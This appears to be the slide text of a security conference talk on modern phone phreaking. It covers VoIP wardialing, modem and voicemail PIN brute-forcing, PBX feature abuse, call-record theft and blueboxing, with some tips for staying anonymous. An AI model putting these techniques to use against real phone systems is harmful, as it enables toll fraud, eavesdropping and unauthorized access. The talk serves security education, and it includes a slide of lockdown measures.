Phree as in Phone Call The other end of the line

43 

Loading....

Loading....

Loading....

Loading....

Loading....

Full text

(1)

Phree as in Phone Call

The other end of the line

(2)

FILE_ID.DIZ

 Advantages of phreaking with VoIP

Modern dialing setup

 Modern wardialing and scanning techniques

Identifying and classifying devices

Identifying and classifying devices  Hacking dial-in lines

System types and login attacks  IVR and voicemail systems

PIN brute-forcing  PaBX’s

 PaBX’s

Exploiting features

(3)

Advantages of phreaking with VoIP

 International destinations much more accessible

VoIP is cheap

Can scam free VoIP

 Don’t need to scan from home anymore

 Don’t need to scan from home anymore

Less knocks at the door  Parallelization

Can run savage burns

 Easier to perform certain attacks

CallerID spoofing

CallerID spoofing

 Automates hand scanning

(4)

Modems and VoIP

 Most people think it can’t be done

Complex codecs cause havoc to connections

Modems can’t connect

Connections drop

Connections drop  It can be done!

What you need

(5)

What you need

(6)

What you need

(7)

What you need

 VoIP account

Lots of cheap providers

voipjet.com

voipbuster.com

voipbuster.com

Trial accounts

Free calls  Asterisk server

Routing

Call recording

Call recording

CallerID spoofing

(8)

Device configuration tricks

 ATA

Compression disabled (G.711 ulaw!)

No echo cancellation (*99 on PAP2)  Modem

 Modem

Disable local flow control

Error-correction

Disable data-compression

(9)
(10)

What can you connect to?

 Modems all over the world

Control systems

SCADA systems

Alarm systems

Alarm systems

 International x.25 networks

India, Africa, Russia, China…

Banking

 Other interesting stuff

Obscure devices and networks

Obscure devices and networks

Bulletin boards (yep!)

(11)

What can you connect to?

(12)

Wardialing

 Automatically dialing numbers to find modems

Target identification

Inventory building  Risks  Risks

Time of day

Randomize numbers!  Modern Wardialing

Use VoIP, UNIX and Asterisk

The Intelligent Wardialer (iWar)

(13)

Wardialing

 iWar

Multiple modems are no problems!

Serial to usb adapters

Scaleable banks of modems with limitless potentional

Scaleable banks of modems with limitless potentional

Remote system identification (126 banners)

MySQL support

CNAM lookup feature

(14)

Wardialing

(15)

Wardialing

 What will we find?

Routers

Remote access servers

PPP dialins

PPP dialins

PC Anywhere

PaBX management systems

IVR systems

Network backdoors

Outdials

Outdials

Diverters (dialtones)

(16)

Wardialing

 Reducing time with blacklists

Internal / employee directories

DDI’s and other numbers harvested from websites

Business directories

Business directories

Websites

CDROMs

Fax directories

Do-not-call lists  Special ranges  Special ranges

(17)

Wardialing

 Published research

Peter Shipley dialed 5.7M numbers over three years

50,000 carriers found

 Found unauthenticated access to

 Found unauthenticated access to

Fire Department's dispatch system

Control system for high-voltage power transmission line

Internal networks of financial organizations

A leased line control system

Credit card number databases

Credit card number databases

(18)

Wardialing

 THC-Scan: Next Generation

Distributed wardialer!

Large modem pools

Large scan ranges - (09) 3XXXXXX

Large scan ranges - (09) 3XXXXXX

Global scanning efforts

(19)

Wardialing

 Callus-free handscanning

iWar with IAX2 connection

Wifi at café, etc

Headphones

Headphones

Time and patience

Upsides

Safe and anonymous

Mostly automated

Handsfree!

(20)

Hacking dial-in lines

 Figuring out what you’re dealing with

System types and banners

Identifying different type login prompts and methods

Building username and password lists

Building username and password lists

Google for defaults  Login Brute-forcing

Tools

(21)

Hacking dial-in lines

(22)

Hacking dial-in lines

(23)

Hacking dial-in lines

Different login prompts and methods

Single auth

Dual auth

Limited or unlimited attempts?

Limited or unlimited attempts?

(24)

Login brute forcing

 Tools

Commercial war dialers (lame)

Modem login hacker for Linux

X.25 NUI/NUA scanners

X.25 NUI/NUA scanners  Homebrew

Minicom runscript

Python serial library

(25)

Login brute forcing

 Modem Login Hacker

Works against any ‘Username:’ or ‘Login:’ variations

Unix, Cisco, PaBXs

Customizable for different login formats

Customizable for different login formats

(26)

IVRs and voicemail

 Fingerprinting voicemail systems

Default prompts

Default mailbox numbers and PINs

Admin mailbox

Admin mailbox

“Nudges” (*8, *81, *, #, 0)

Can you find the admin console?  CallerID spoofing attacks

ANI or CID authentication is very bad!  Call forwarding and out-dials

 Call forwarding and out-dials

(27)

IVRs and voicemail

 Launching a PIN brute force attack

Things to figure out

Dial-in numbers and PIN length

Numbering format for mailboxes

Numbering format for mailboxes

(28)

PIN brute forcing

 Metalstorms mighty Hai2IVR

SIP-client for brute forcing DTMF prompts

Can record calls and scan in parallel

GUI for sorting and listening to the results

GUI for sorting and listening to the results

(29)

PIN brute forcing

 Components

Hai2IVR GTK interface

Handles the parallelization

GUI for reviewing results

GUI for reviewing results

metlodtmfzor

Makes the calls and sends the DTMF

Command line scriptable  Hai2IVR setup

Route through Asterisk

Route through Asterisk

Authenticated SIP

(30)

Predictable PINs  Keypad patterns

Making shapes

L, X, O

Repeating numbers

Repeating numbers

2244, 9988

Patterns  Other lists

Birth dates

Pop culture references

Pop culture references

1984, 1337 (WiteRabits PIN)

(31)
(32)

Predictable PINs

 PINPop.com

Research project into predictable PINs

PIN database analysis  Goals

 Goals

Secure PIN selection patches to Asterisk

(33)

PaBX hacking

 Attack categories

Theft of service

Routing manipulation

Traffic analysis (stealing CDR’s)

Traffic analysis (stealing CDR’s)

Social engineering

(34)

PaBX hacking

 The Holy Grail

 Access to the maintenance console

 Dial-in lines, extensions, computers  Feature exploits

 Conferencing

 Three-way calling

 Call forwarding

 Direct Inwards System Access (DISA)

 Test features that remotely activate mics  Theft of CDR’s

 Theft of CDR’s

 Industrial espionage  Advanced auditing

(35)

PaBX hacking

(36)

PaBX hacking

 A hacked Meridian management console can:

Setup trunks to allow outgoing calls

Manipulate trunks

Re-route incoming / outgoing calls

Re-route incoming / outgoing calls

Eavesdrop extensions

Set a Meridian Mail box to auto logon temporarily

Shut down the PaBX

Make phones ring infinitely

Trace calls through CDR records

Trace calls through CDR records

(37)

PaBX hacking

 Lockdown methods

Restricted out dialing

Forwarding features disabled

Enforced minimum PIN size

Enforced minimum PIN size

Unused boxes deactivated

Lockout counters with manual reset

Timeouts on setup of new mailboxes

Challenge response systems

US Government classified VMSs need SecureID’s

US Government classified VMSs need SecureID’s

(38)

PaBX hacking

 CDR’s and datamining

Sensitive information can be gleaned from call records

Who called who and when

Current and potential clients, contractors

Current and potential clients, contractors

Recent company activities  AMDOCS Example

Handles billing for most American telcos

FBI and NSA investigation into sending CDRs offshore

Possibility of Israeli's spying on American's through CDRs

(39)

The infinite power of Asterisk

 Custom setups

Testing environment for tools

Anonymous voicemail servers

Encrypted voice

Encrypted voice

Private networks like DetoVoIP and Telephreak

Rogue PaBX’s for evesdropping  Custom features

ProjectMF: A trip down phone-phreak memory lane

Asterisk patches to support MF in-band signaling

Asterisk patches to support MF in-band signaling

Lets you bluebox telephone calls

(40)

The infinite power of Asterisk

(41)

The infinite power of Asterisk

 Call the ProjectMF server

Get dropped to a C5 trunk

Hold the phone up to the speakers

Seize the trunk with a 1 second burst of 2600Hz

Seize the trunk with a 1 second burst of 2600Hz

Send KP + 12588+ ST in multi-frequency tones (MF)

Call connects

(42)

Thanks

 Thanks & greats to:

SA.com

SLi

Andrew Horton

Andrew Horton

Metlstorm

Detonate

Kiwicon crew

Beave

Jfalcon

Jfalcon

M4phr1k

(43)

NO CARRIER

http://www.security-assessment.com

john@security-assessment.com

Figure

Updating...

References

Updating...

Related subjects :